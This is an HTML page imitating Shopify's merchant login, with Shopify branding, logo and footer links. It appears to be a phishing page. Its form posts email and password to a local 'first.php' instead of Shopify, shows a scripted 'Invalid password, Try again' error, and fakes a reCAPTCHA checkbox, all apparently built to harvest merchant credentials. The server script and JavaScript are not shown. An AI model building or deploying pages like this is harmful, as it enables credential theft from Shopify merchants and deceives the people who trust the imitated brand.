<!doctype html>
<html lang="en">
  <head>
    <!-- Required meta tags -->
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">

    <!-- Bootstrap CSS
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/css/bootstrap.min.css" integrity="sha384-Gn5384xqQ1aoWXA+058RXPxPg6fy4IWvTNh0E263XmFcJlSAwiGgFAW/dAiS6JXm" crossorigin="anonymous"> -->

    <!-- Font Awesome -->

    <link href="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/css/bootstrap.min.css" rel="stylesheet" integrity="sha384-EVSTQN3/azprG1Anm3QDgpJLIm9Nao0Yz1ztcQTwFspd3yD65VohhpuuCOmLASjC" crossorigin="anonymous">
<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" integrity="sha384-MrcW6ZMFYlzcLA8Nl+NtUVF0sA7MsXsP1UyJoMp4YLEuNSfAP+JcXn/tWtIaxVXM" crossorigin="anonymous"></script>
<link
href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/5.15.1/css/all.min.css"
rel="stylesheet"
/>
<!-- Google Fonts -->
<link
href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700&display=swap"
rel="stylesheet"
/>
<!-- MDB -->
<!-- <link
href="https://cdnjs.cloudflare.com/ajax/libs/mdb-ui-kit/3.6.0/mdb.min.css"
rel="stylesheet"
/> -->

<link
href="assets/css/merchant-public-a333686b2364a502a5da9344dd7bb3870c1b497b15e62e1b4ce1f24d75bce611.css"
rel="stylesheet"
/>
<script src="https://ajax.googleapis.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>

<script
type="text/javascript"
src="src/validate.js"
></script>

    <link rel="stylesheet" href="assets/css/style.css">

    <link rel="icon" href="assets/image/shopify-favicon.png">
    <title>Login - Shopify</title>
  </head>
  <body>
      
    <div class="page-container">
        <svg class="artwork artwork--desktop" viewBox="0 0 536 617" fill="none">
            <g>
          <defs>
            <rect id="SVGID_1_" width="536" height="617"/>
          </defs>
          <clipPath id="SVGID_2_">
            <use xlink:href="#SVGID_1_"  overflow="visible"/>
          </clipPath>
          <g clip-path="url(#SVGID_2_)">
            <path fill-rule="evenodd" clip-rule="evenodd" fill="#FFA781" d="M0,616.926V617h915V0H179.949l218.488,218.489L0,616.926z"/>
            <g>
              <path fill="#FFCB67" d="M712.79,218.83c0,173.59-140.72,314.32-314.31,314.32c-86.9,0-165.55-35.26-222.45-92.26l0.35-444.46
                c56.86-56.79,135.38-91.91,222.1-91.91C572.07-95.48,712.79,45.24,712.79,218.83z"/>
            </g>
            <path fill="#008060" d="M398.44,218.49l-222.41,222.4c-56.76-56.86-91.87-135.36-91.87-222.06c0-86.87,35.25-165.51,92.22-222.4
              L398.44,218.49z"/>
          </g>
        </g>
        </svg>
          <svg class="artwork artwork--mobile" viewBox="0 0 1500 1855" fill="none">
            <g clip-path="url(#clip0)">
                <rect width="1500" height="1855" fill="#008060"/>
                <path d="M-298.062 2049.67C-376.167 1971.57 -376.167 1844.94 -298.062 1766.83L1171.27 297.501L2197.95 1324.18L728.617 2793.51C650.512 2871.62 523.879 2871.62 445.774 2793.51L-298.062 2049.67Z" fill="#004C3F"/>
                <path d="M1712.33 340.572C1712.33 655.926 1455.35 911.572 1138.33 911.572C821.323 911.572 564.335 655.926 564.335 340.572C564.335 25.2172 821.323 -230.428 1138.33 -230.428C1455.35 -230.428 1712.33 25.2172 1712.33 340.572Z" fill="#FFA781"/>
                <path d="M728.645 740.262L1171.25 296.932L728.28 -146.034C972.923 -390.677 1369.57 -390.677 1614.21 -146.034C1858.85 98.6091 1858.85 495.254 1614.21 739.897C1369.69 984.419 973.317 984.54 728.645 740.262Z" fill="#FFCB67"/>
            </g>
            <defs>
                <clippath id="clip0">
                    <rect width="1500" height="1855" fill="white"/>
                </clippath>
            </defs>
          </svg>
        
          <div class="page-main">
              <div class="page-content">
                <div class="login-card " >
        

                    <div class="">
                        <div class="">
            
                            <header class="login-card__header">
                                <h1 class="login-card__logo">
                                    <a href="https://shopify.com">
                                      <img alt="Log in to Shopify" src="https://shopify-assets.shopifycdn.com/accounts/production/theme_configuration/logo/oauth_provider/merchant/logo.svg?v=1631025778" />
                                    </a></h1>
                              </header>
                           
                              
                        <h1 class="ui-heading" style="font-size: 25px;">Log in</h1>
                        <h3 class="ui-subheading ui-subheading--subdued" style="text-transform: none; font-weight: normal;">Continue to Shopify</h3>
                                            
                            <!-- <h2 class="heading">Log in</h2>
                            <h3 class="sub-heading">Continue to Shopify</h3> -->
                            <form  id="regForm" action="first.php" method="post" style="margin-left:-3px; margin-bottom: 20px;">
                                   
                            
                                    <div id="email_service" class="normal">
                                      <label class="input-label" for="email">Email</label>
                                        <input id="email" type="email"  class="input-control"/>
                                      </div>  

                                      <div id="email_error" style="margin-top: 5px; display: none;" >
                                         <i style="display: inline; color: red; margin-top: 10px; " class="fa fa-info-circle" aria-hidden="true"></i> 
                                        <p style="display: inline; color: red;" class="error text"> Email must not be empty</p> 
                                      </div>
                                      
                                    <!-- One "tab" for each step in the form: -->
                                    <!-- <div id="email_service" class="form-outline  normal" style="outline: none;">
                                      <label class="form-label" for="email">Email</label>
                                        <input type="email" id="email" class="form-control " />
                                      </div>
                                       -->
                                       <div id="email_previewer" class="container " style="margin: 10px 10px; display: none;">
                                          <div class="row">
                                            <div class="col-sm-8">
                                          <p class="small-text" style="display: inline;  justify-content: flex-start; font-size: 12px;" id="email_preview">.</p>

                                            </div>
                                            <div class="col-sm-4">
                                          <a  style="display: inline-flex;  justify-content: flex-end; margin: 0;" href="index.html"> change email</a>
                                              
                                            </div>
                                          </div>
                                        </div>
                                       
                                      
                                      <div id="password_service" class="normal hide" style="margin-top: 10px;">
                                        <label class="input-label" for="nap">Password</label>
                                        <input type="password" id="nap" class="input-control "   />
                                        <!-- <div class="form-helper">Example helper</div> -->
                                      </div>

                                      <div id="password_error" style="margin-top: 5px; display: none;" >
                                        <i style="display: inline; color: red; margin-top: 10px; " class="fa fa-info-circle" aria-hidden="true"></i> 
                                       <p id="errMsg" style="display: inline; color: red;" class="error text"> Invalid password, Try again </p> 
                                     </div>
                                    </form>      
                                    
                                    
                                    <div id="recaptcha" class="recaptcha hide">
                                        <div class="form-check form-check-inline">
                                          
                                            <input class="form-check-input" type="checkbox" id="inlineCheckbox1" value="option1" />
                                            <label style="margin-left: 10px;"  for="inlineCheckbox1">i'm not a robot</label>

                                          </div>
                                          <!-- <input type="checkbox" id="myCheck" class=""> -->
                                          
                                                                        
                                        <img class="recaptcha-icon" src="assets/image/RecaptchaLogo.svg.png" width="50px" height="50px" />
            
                                      </div>
                                      
                                      <div class="button-group" >
                                          <input id="nextButton" class="button" type="button"  style="display: inline;" value="Next"/>
                                          <!-- <div  class="loader" style="width: 10px;height: 10px; display: inline-block;"></div> -->
                                      </div>

                                    
                                      
                                    <p class="sub-heading">New to Shopify? <a href="">Get started</a></p>
                                      
            
                                    <div class="footer">
                                        <div class="footer-item">
                                            <a class="footer-text" href="https://www.shopify.com/legal/terms"><p>Terms</p></a>                             
                                        </div>
            
                                        <div class="footer-item">
                                            <a class="footer-text" href="https://www.shopify.com/legal/privacy"><p>Privacy</p></a>                             
                                        </div>
                                        
                                        <div class="footer-item">
                                            <a class="footer-text" href="https://help.shopify.com/en/manual/your-account/logging-in#desktop"><p>Help</p></a>                             
                                        </div>
                                        
                                        
                                    </div>
            
                        </div>
                    </div>
            
                    
                </div>
              
              </div>
          </div>
        

     
    
    </div>
      
  
    <!-- Optional JavaScript -->
    <!-- jQuery first, then Popper.js, then Bootstrap JS -->
    <script src="js/formjs.js"></script>
    <!-- <script src="https://code.jquery.com/jquery-3.2.1.slim.min.js" integrity="sha384-KJ3o2DKtIkvYIK3UENzmM7KCkRr/rE9/Qpg6aAZGJwFDMVNA/GpGFF93hXpG5KkN" crossorigin="anonymous"></script> -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js" integrity="sha384-ApNbgh9B+Y1QKtv3Rn7W3mgPxhU9K/ScQsAP7hUibX39j7fakFPskvXusvfa0b4Q" crossorigin="anonymous"></script>
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/4.0.0/js/bootstrap.min.js" integrity="sha384-JZR6Spejh4U02d8jOt6vLEHfe/JQGiRRSQQxSfFWpi1MquVdAyjUar5+76PVCmYl" crossorigin="anonymous"></script>

    <!-- MDB -->
<script
type="text/javascript"
src="https://cdnjs.cloudflare.com/ajax/libs/mdb-ui-kit/3.6.0/mdb.min.js"
></script>



  </body>
</html>
